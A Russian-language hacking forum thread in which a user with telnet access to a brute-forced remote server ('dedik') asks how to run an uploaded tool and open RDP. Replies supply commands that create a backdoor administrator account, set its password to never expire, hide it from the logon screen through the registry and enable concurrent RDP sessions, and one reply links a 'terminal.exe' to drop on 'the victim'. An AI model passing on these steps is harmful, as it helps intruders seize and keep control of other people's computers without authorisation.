Открыть файл через telnet — HackZona.Ru

Вообщеи имею доступ к компьютеру через telnet, залил туда файл, который открывает подключение по удалённому рабочему столу и создаёт пользователя с соответствующими правами. Вопрос — Как запустить этот файл?? Если он допустим лежит прямо на c:!!! Ответьте срочно плз. Нужен доступ к деду очень срочно! Нету времени читать маны.

Открыть файл через telnet

Сообщений в теме: 24
Нравится
Не нравится
Рейтинг: 0
Кол-во тем: 0
Вообщеи имею доступ к компьютеру через telnet, залил туда файл, который открывает подключение по удалённому рабочему столу и создаёт пользователя с соответствующими правами. Вопрос — Как запустить этот файл?? Если он допустим лежит прямо на c:!!!
Ответьте срочно плз. Нужен доступ к деду очень срочно! Нету времени читать маны.
Нравится
Не нравится
)))
надо было СНАЧАЛО читать маны!

там все как с обычной cmd — просто пропиши путь
например
[CODE]C:\file.bat[/CODE]
помойму даже call не нужен (для батников) — и так работает
а с exe тем более
Нравится
Не нравится
Ещё 1 вопрос и отстану. Как открыть rdp через Telnet?)))
Нравится
Не нравится
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup «Remote Desktop Users» user /add
net accounts /maxpwage:unlimited
exit
Нравится
Не нравится
Причём тут создание учётки…

Ещё 1 вопрос и отстану. Как открыть rdp через Telnet?)))

Как открыть удалённый доступ к компьютеру через mstsc
Нравится
Не нравится
cmd
net user user pass /add
exit
И коннектишься через mstsc! Не флуди! вбиваешь пасс и логин учетки!
Нравится
Не нравится
Как бы тебе обьяснить…
[code]
МНЕ НУЖНО ПОРТ ОКРЫТЬ А НЕ ЮЗЕРА ДОБАВИТЬ!!!
Я через радмина работаю там!!!!!!!1 А ХОЧУ ЗАХОДИТЬ ЧЕРЕЗ удалённый рабочий стол!![/code]. Если ща опять напишешь
cmd
net user user pass /add
exit
Я умру)
Нравится
Не нравится
Кол-во тем: 50
Свойства системы -> Удалённые сеансы -> Разрешить удалённый доступ к этому компьютеру.

Быстрое переключение пользователей: Учётные записи пользователей-> Изменение входа пользователей в систему.

Если необходимо, делаем пользователя скрытым на экране приветствия:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
«asdf»=dword:00000000
Нравится
Не нравится
Через telnet…
Нравится
Не нравится
Есть мыслишка, что можно написать программу, открывающую порт, залить на комп и запустить.
Нравится
Не нравится
Рейтинг: 1
[QUOTE=-JC-;98845]Есть мыслишка, что можно написать программу, открывающую порт, залить на комп и запустить.[/QUOTE]
в народе это называеться биндшелл)
хотя какой шелл в вине?
Нравится
Не нравится
У меня эта программа есть))) Она даже пользователя создаёт с правами. Знакомый написал. Но как её запустить) Или раассажите как самому открыть порт) Я от вас ни того ни того ответа дождатсо немогу)
Нравится
Не нравится
К чему такой изврат? Ты ведь говоришь, что есть радмин. Ну ок, телнет, так телнет.

Вот параметры:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core]
«EnableConcurrentSessions»=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
«AllowMultipleTSSessions»=dword:00000001

Вот команда: reg add
Запустишь так: reg add /? увидишь необходимые тебе ключи.

Название раздела соответственно заменишь на HKLM

Колдуй.
Нравится
Не нравится
для того чтобы открыть порт необходимо то что его будет слушать… в данном случае rdp, т.е. необходимо разрешить удаленный доступ юзверям… как это сделать тебе уже тут разжевали… если после этого не конектится, значит что-то блочит этот порт…
Нравится
Не нравится
Я ж вам не рассказал, раньше этот дедик был норм) Но потом он ушёл в офф. И вот вышел через месяц опять, я брут поглядел- 20 гудов (через передачу файлов скопировал себе на комп папку good). Жалко хороший дед терять Но по управлению рабочего стола не подключаеться, точнее вылетает окно подключенияч и исчезает. А по телнету коннектит.
P.S. Про regadd поподробнее)
Нравится
Не нравится
[QUOTE=Ssidit;98859]
P.S. Про regadd поподробнее)[/QUOTE]

[QUOTE='Soviet[HZ];98856']
Запустишь так: reg add /? увидишь необходимые тебе ключи.
[/QUOTE]

Необходимый раздел, ветки и ключи тебе известны. Что еще подробней?
Нравится
Не нравится
[QUOTE=Ssidit;98855]У меня эта программа есть))) Она даже пользователя создаёт с правами. Знакомый написал. Но как её запустить) Или раассажите как самому открыть порт) Я от вас ни того ни того ответа дождатсо немогу)[/QUOTE]

нужно закинуть жертве один файл ([URL=«depositfiles.com/files/smjnqsd6v»]terminal.exe[/URL])
после чего, запустить через телнет, например (C:\terminal.exe)
у него откроется порт rdp, потом создаеш учетку и заходиш к нему своим пользователем!
Нравится
Не нравится
Попробовал на свой машине, работает, только юзера asdf создаёт… Подозрительно, ну вообщем залил на дед на диск c:, вопрос — как запустить. И ещё 1 вопрос как закрыть у меня 3389 порт?))) Я через мой компьютер прикрыл возможность удалённо управлять, но слышал ещё чтото в реестре надо делать…
Нравится
Не нравится
[QUOTE=Ssidit;98886]Попробовал на свой машине, работает, только юзера asdf создаёт… Подозрительно, ну вообщем залил на дед на диск c:, вопрос — как запустить. И ещё 1 вопрос как закрыть у меня 3389 порт?))) Я через мой компьютер прикрыл возможность удалённо управлять, но слышал ещё чтото в реестре надо делать...[/QUOTE]

как запустить — тебе уже сказали: С:\имя.файла
закрыть порт можно файрволом, в реестре ничего делать не нужно… ставишь себе любой приглянувшийся файрволл и создаешь в нем правило
Нравится
Не нравится
[QUOTE=Ssidit;98886]Я через мой компьютер прикрыл возможность удалённо управлять, но слышал ещё чтото в реестре надо делать...[/QUOTE]

Действия производимые через интерфейс системы, заносятся в реестр и наоборот.
Нравится
Не нравится
Действия производимые через интерфейс системы, заносятся в реестр и наоборот.
. Это я знаю. Но читал что закрытие самого доступа через rdp и закрытие порта 3389 — это разные вещи.

[quote]как запустить — тебе уже сказали: С:\имя.файла
закрыть порт можно файрволом, в реестре ничего делать не нужно… ставишь себе любой приглянувшийся файрволл и создаешь в нем правило[/quote]
Фаервол я сразу после того поставил) А запустить же вроде командой start…

Ребят и вот ещё такая проблема — когда запустил, эта штука вроде подпортила мне файлы в винде, и вот сидел вылетела ошибка памяти… Ничего ужасного она не сделала, но неприятно… Сейчас вроде затишье. Диска обновляющего нету. Подскажите как поступать если ошибка по новой вылетет. Ошибка в svchost (процесс — system). Может просто ктото свой выложил чтобы я заменил. Хз вообщем.
Нравится
Не нравится
а как залить файл через телнет объясните
Нравится
Не нравится
Нравится
Не нравится
[QUOTE=Ssidit;98907]Но читал что закрытие самого доступа через rdp и закрытие порта 3389 — это разные вещи.
[/QUOTE]

Естественно разные. Вопрос то в чем?
Нравится
Не нравится
и чем нецелесообразние вопрос, тем ниже падает твоя репутация в глазах учасников, и тем сильнее будут ругатся и наказывать модераторы форума за этот вопрос…
Для того, чтобы отвечать в темах на форуме необходимо войти на сайт или зарегистрироваться.